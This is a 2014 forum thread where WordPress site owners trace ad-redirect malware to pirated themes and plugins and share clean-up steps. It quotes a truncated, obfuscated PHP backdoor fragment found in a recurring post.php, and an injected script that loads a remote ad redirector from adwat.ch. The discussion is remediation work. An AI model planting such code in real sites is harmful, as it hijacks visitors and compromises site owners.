13.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

03-20-2014, 05:20 PM
Post: #41
RE: Have the same problem
I have the same problem with my website. Was not able to find any solution, but I found something weird.
A file called post.php with this in it:

0) print "\x53T\x41TUS\x2d\x49\x4dP\x4f\x52T-\x4fK"; if (strlen($input) > 10) { $fp = @fopen(str_replace("\x2ep\x68\x70",".\x62\x69\x6e",basename($_SERVER["SC\x52\x49P\x54_FIL\x45\x4eAM\x45"])), "a"); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER["\x52\x45\x4dOTE\x5f\x41DDR"]."\t".base64_encode($input)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } elseif (strpos($_SERVER["\x52\x45Q\x55\x45\x53T\x5f\x55R\x49"], "\x2es\x68\x74\x6dl") !== false) { print $_SERVER["\x52\x45Q\x55\x45\x53T\x5f\x55R\x49"]; } exit; ?>



Could it be related? I deleted the file multiple times and it keeps re-appearing.
03-20-2014, 06:08 PM (This post was last modified: 03-20-2014 06:14 PM by bale.)
Post: #42
RE:
(03-20-2014 02:23 PM)sreekuttan.dev@gmail.com Wrote:  I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from
Code:
http://www4.zippyshare.com/v/25614833/file.html
and causing redirect at random time intervals from all my links on website.


open functions.php and remove this line: include 'inc/settings_class.php';

also remove the file at that location.

The jerk doing this uses an include function to the infected file. Its pretty easy to spot since its at the very top of functions.php or in the case of mymail plugin include 'classes/wc.class.php'; right at the top of mymail.php
03-20-2014, 06:12 PM (This post was last modified: 03-20-2014 06:15 PM by adwatch.)
Post: #43
RE:
(03-20-2014 03:19 PM)r1ckd33zy Wrote:  
(03-20-2014 11:56 AM)adwatch Wrote:  Hello to everyone at bestblackhatforum, my name is James and I am head of technical support over at adwat.ch

We have gone ahead and banned user: 234224

If these links are still causing you trouble please PM me your domain in question and I will add it to our domain block list.

Alternatively you can contact us here: http://adwat.ch/contact.php 24 hours a day 7 days a week.

thank you and stay safe.
This is a most amazing act of 'customer support' i have seen in a while. Who would have thought that someone for adwat.ch would be involved in supporting members of a 'blackhat' forum...
Haha We are a fairly new company and want to keep our name clean. We figure if we work with publishers whether it be blackhat or whitehat we can work together. Plus we have some really good fraud checks which none of our competitors have.

(03-20-2014 03:43 PM)imxa Wrote:  
(03-20-2014 03:19 PM)r1ckd33zy Wrote:  
(03-20-2014 11:56 AM)adwatch Wrote:  Hello to everyone at bestblackhatforum, my name is James and I am head of technical support over at adwat.ch

We have gone ahead and banned user: 234224

If these links are still causing you trouble please PM me your domain in question and I will add it to our domain block list.

Alternatively you can contact us here: http://adwat.ch/contact.php 24 hours a day 7 days a week.

thank you and stay safe.
This is a most amazing act of 'customer support' i have seen in a while. Who would have thought that someone for adwat.ch would be involved in supporting members of a 'blackhat' forum...

Is it safe give the link of our sites? I mean, he can be a guy who collect sensitive data of our websites with this CR$%P script and he need our site link to take control of it. Im a paranoid, but this advertising company dont make me feel safe at all. I hope he is from a real technical support.
You don't need to PM your website if your worried. You're welcome to contact us here: http://adwat.ch/contact.php
03-20-2014, 07:17 PM
Post: #44
RE:
(03-20-2014 06:08 PM)bale Wrote:  
(03-20-2014 02:23 PM)sreekuttan.dev@gmail.com Wrote:  I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from
Code:
http://www4.zippyshare.com/v/25614833/file.html
and causing redirect at random time intervals from all my links on website.


open functions.php and remove this line: include 'inc/settings_class.php';

also remove the file at that location.

The jerk doing this uses an include function to the infected file. Its pretty easy to spot since its at the very top of functions.php or in the case of mymail plugin include 'classes/wc.class.php'; right at the top of mymail.php
Where is this file ''functions.php'' located as I can't find it in my blog location?
03-20-2014, 08:32 PM
Post: #45
RE:
Follow these steps

Login to you wp-admin and then go to your site
click view source
now ctrl+f and search body {visibility:hidden;}
this code confirms adwatch is inserted in your theme or plugins.

this code is implemented before</head> tag

if you access on same browser where you login as admin you will find this source code on your home page
<style>
body {visibility:hidden;}</style>

now go to exploit-scanner plugin then chek that
Search for suspicious styles option
click start scan
after some time it will reload
now again ctrl+f search " body {visibility:hidden;}
and check which file is affected and then uninstall that theme or plugin or delete that code on that file
26.gif
03-20-2014, 10:38 PM
Post: #46
RE:
Yes this happened to me a few years ago. I downloaded a theme and installed it, then I began getting the message this site has been hacked. I removed the theme, deleted the sub-domain it was under. Then I checked each .js file and looked for the word "var" and sure enough I found a re-direct link.

Not every var text is bad just look for things like:
var adwatch
var iframe
var exclude
var adwatch _advert


and so on...
Good hunting.
03-21-2014, 12:14 AM
Post: #47
RE:
Hi already try to search adwat on all source files of wordpress and nothing is found. The strange thing is that this is still hapenning after i bought the theme replace all files and the problem still happens. I´m suspecting that the malware must be on the database or on other place than the theme files.
But i cant find it anyware.
03-21-2014, 07:19 AM
Post: #48
RE:
(03-20-2014 06:08 PM)bale Wrote:  
(03-20-2014 02:23 PM)sreekuttan.dev@gmail.com Wrote:  I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from
Code:
http://www4.zippyshare.com/v/25614833/file.html
and causing redirect at random time intervals from all my links on website.


open functions.php and remove this line: include 'inc/settings_class.php';

also remove the file at that location.

The jerk doing this uses an include function to the infected file. Its pretty easy to spot since its at the very top of functions.php or in the case of mymail plugin include 'classes/wc.class.php'; right at the top of mymail.php
Go for this solution its worked....
03-21-2014, 08:15 AM
Post: #49
RE:
Thanks to adwatch, the adds until now are gone, but i cant find the find the script yet, the recomendations

"bale Wrote:
(Today 04:23 AM)sreekuttan.dev@gmail.com Wrote:
I am also facing this issue with theme themeforest_flatsome_1.8.7 downloaded from
Code:
http://www4.zippyshare.com/v/25614833/file.html
and causing redirect at random time intervals from all my links on website.


open functions.php and remove this line: include 'inc/settings_class.php';

also remove the file at that location.

The jerk doing this uses an include function to the infected file. Its pretty easy to spot since its at the very top of functions.php or in the case of mymail plugin include 'classes/wc.class.php'; right at the top of mymail.php
Go for this solution its worked....

Read more @ bestblackhatforum.com : Beware before downloading wordpress themes and plugins [adwatch] http://bestblackhatforum.com/Thread-Bewa...z2wXm8El5K
bestblackhatforum.com "


Didnt work for me because i dont have that string in my functions file, but thanks anyway
03-21-2014, 10:52 AM
Post: #50
RE:
I'd like to thank everyone for sharing their contributions to this thread b/c I also ran across this problem w/ a plugin that I installed (EventON).
After spending countless hours going over every line of code with a colleague, it finally dawned on me to look @ the code that "bale" suggested was the problem.

My file was hidden away in "classes/class-settings.php" and called by include 'classes/class-settings.php'; in my eventon.php file.

The key is to do a search (I used the Multi-File Search in TextWrangler of my entire site --- downloaded locally to my machine) for the following string: spamcheckr

The "infected" file (class-settings.php) has a ton of commented out lines of code, but it really only does one thing which is to pull the URL "http://spamcheckr.com/l.php". Just bringing that URL up in your browser will show a blank page. But if you view the source, you will see the following code:

Code:
<script type="text/javascript">
    var adwatch_id = 234224;    var adwatch_advert = "int";    var exclude_domains = ['wp-admin', 'wp-login', 'hillaryClinton2016.com', 'mpmgworld.com', 'madeforher.in', 'robfordformayor.ca', 'pachecovirtual.com.ar', 'corporativo2.tk', 'r3d.pt'];</script><script type="text/javascript" src="http://adwat.ch/js/easylink.js"></script>

As "bale" suggested, just delete the include from your file and delete that class-settings.php and you should be good to go.
Hope this helps.
35.gif




17.gif